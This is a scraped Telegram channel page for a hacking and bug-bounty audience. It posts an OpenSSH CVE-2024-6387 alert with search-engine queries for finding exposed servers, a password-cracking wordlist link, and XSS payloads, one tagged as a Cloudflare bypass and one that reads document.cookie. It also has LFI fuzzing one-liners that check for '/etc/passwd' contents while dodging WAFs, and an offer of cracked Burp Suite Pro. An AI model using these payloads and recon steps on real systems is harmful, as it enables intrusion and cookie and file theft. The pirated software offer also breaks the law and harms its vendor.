haxshadow
4.19K subscribers
86 photos
1 video
27 files
141 links
ᴛʜɪs ᴄʜᴀɴɴᴇʟ ɪs ᴀʟʟ ᴀʙᴏᴜᴛ Bᴜɢ ʜᴜɴᴛɪɴɢ ﹠ Cʏʙᴇʀsᴇᴄ ﹠ Eᴛʜɪᴄᴀʟ Hᴀᴄᴋɪɴɢ ʀᴇʟᴀᴛᴇᴅ ᴄᴏɴᴛᴇɴᴛs.
any query msg me at @haxshadow_bot
Youtube:https://youtube.com/@haxshadow7
IF you want to support ;)
Download Telegram
🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server


The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated RCE as root on glibc-based Linux systems; that presents a significant security risk.


👇Query
Hunter: /product.name="OpenSSH"
FOFA: app="OpenSSH"
SHODAN: product:"OpenSSH"
🤮31
latest 2024 rockyou list for password cracking & bruteforcing dir https://t.co/7rW9Q9Nx0M
3🤮2
4👏4🤣3👍1💩1
haxshadow
https://youtu.be/EUBhZOFAcxA
XSS Payload

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

"><img src=x onerror=confirm(document.cookie)>

<sVg/onLy=1 onLoaD=confirm(1)//
I am back ..
Burp Suite Pro v2024.7.1 Cracked
try this amazingg xss scanner made by our brother sarper its so fast bcz of new method it can scan 1k urls in just 5-20 sec with 99% success rate it scan urls with xss polyglots payloads and run on all urls parameters just put all urls in wordlist file ones you get hit just open that link directly and xss popup show ❤️
https://github.com/sarperavci/MXS
👍21
try this amazingg auto scanner made by our brother..
https://github.com/wapiti-scanner/wapiti
try this amazingg LFI oneliner its veryfast and effective also change ffuf useragent so its dont get blocked by waf's

waymore -i "
testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done



waymore -i "
testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt


cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
👍3